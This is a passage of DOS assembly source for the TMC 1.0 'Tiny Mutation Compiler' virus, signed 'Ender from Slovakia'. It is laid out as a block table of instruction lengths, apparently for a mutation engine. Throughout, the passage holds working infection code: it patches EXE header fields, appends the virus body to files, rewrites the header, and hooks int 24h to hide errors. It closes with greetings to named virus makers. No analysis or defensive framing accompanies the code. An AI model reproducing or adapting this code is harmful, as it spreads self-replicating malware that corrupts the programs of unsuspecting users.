|
|
|||
|
div cx ; DX:AX = filesize in pages
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [si+02h],dx ; Store number of bytes in last 51...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Increase total number of 512-byt...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov [si+04h],ax ; Store total number of 512-byte p...
|
|||
|
|
|||
|
db 05h ; Five bytes instruction
|
|||
|
|
|||
|
mov [si+0ah],800h ; Store minimum paragraphs of memo...
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
inc ax ; Store total number of 512-byte p...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov cl,05h ; Divide by thirty-two
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
shl ax,cl ; AX = total number of 512-byte pa...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
sub ax,[si+08h] ; Subtract header size in paragrap...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add ax,[si+0ah] ; Add maximum paragraphs to alloca...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ds:[1234h],ax ; Store new size in paragraphs
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 1393h ; Pointer to new_mcb_siz
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
sub di,ax ; DI = additional minimum paragrap...
|
|||
|
|
|||
|
db 01110110b+10000000b ; Below or equal? Jump to dont_add...
|
|||
|
dw 1396h ; Pointer to dont_add_mem
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
add [si+0ah],di ; Add additional minimum paragraph...
|
|||
|
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 1396h ; Pointer to dont_add_mem
|
|||
|
db 11101111b ; End of block
|
|||
|
dont_add_mem db 11101110b ; Beginning of block
|
|||
|
dw 1396h ; Block identification of dont_add...
|
|||
|
db 06h ; Six bytes instruction
|
|||
|
|
|||
|
mov word ptr ds:[01h],00h
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,40h ; Write to file
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; Zero DX
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,1234h ; CX = length of virus
|
|||
|
|
|||
|
db 11101101b ; Data reference
|
|||
|
dw 66h ; Pointer to virus_end
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor cx,cx ; CX = high-order word of offset f...
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
xor dx,dx ; DX = low-order word of offset f...
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov ax,4200h ; Set current file position (SOF)
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov ah,40h ; Write to file
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov dx,si ; DX = offset of exe_header
|
|||
|
|
|||
|
db 03h ; Three bytes instruction
|
|||
|
|
|||
|
mov cx,18h ; Write twenty-four bytes
|
|||
|
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
db 01110010b+10000000b ; Error? Jump to close_file
|
|||
|
dw 0fah ; Pointer to close_file
|
|||
|
db 11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
dw 138eh ; Pointer to set_file_inf
|
|||
|
db 11101111b ; End of block
|
|||
|
int24_virus db 11101110b ; Beginning of block
|
|||
|
dw 1770h ; Block identification of int24_virus
|
|||
|
db 02h ; Two bytes instruction
|
|||
|
|
|||
|
mov al,03h ; Fail system call in progress
|
|||
|
|
|||
|
db 01h ; One byte instruction
|
|||
|
|
|||
|
iret ; Interrupt return
|
|||
|
|
|||
|
db 11101111b ; End of block
|
|||
|
exe_header db 11101110b ; Beginning of block
|
|||
|
dw 138fh ; Block identification of exe_header
|
|||
|
db 18h+10h ; Twenty-four bytes data
|
|||
|
db 18h dup(00h) ; EXE header
|
|||
|
db 11101111b ; End of block
|
|||
|
file_time db 11101110b ; Beginning of block
|
|||
|
dw 12ch ; Block identification of file_time
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; File time
|
|||
|
db 11101111b ; End of block
|
|||
|
file_date db 11101110b ; Beginning of block
|
|||
|
dw 12dh ; Block identification of file_date
|
|||
|
db 02h+10h ; Two bytes data
|
|||
|
dw 00h ; File date
|
|||
|
db 11101111b ; End of block
|
|||
|
message db 11101110b ; Beginning of block
|
|||
|
dw 2328h ; Block identification of message
|
|||
|
db (message_end-messag_begin)+10h
|
|||
|
messag_begin db 0dh,0ah
|
|||
|
db 0dh,0ah
|
|||
|
db '<27> TMC 1.0 by Ender from Slovakia <20>',0dh,0ah
|
|||
|
db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah
|
|||
|
db 'Dis is level 42.',0dh,0ah
|
|||
|
db 'Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel',0dh,0ah
|
|||
|
db 'Personal greetings: K. K., Dark Punisher',0dh,0ah
|
|||
|
db 0dh,0ah
|
|||
|
message_end:
|
|||
|
db 11101111b ; End of block
|
|||
|
db 00h ; End of table
|
|||
|
code_end:
|
|||
|
table_end:
|
|||
|
|
|||
|
end code_begin
|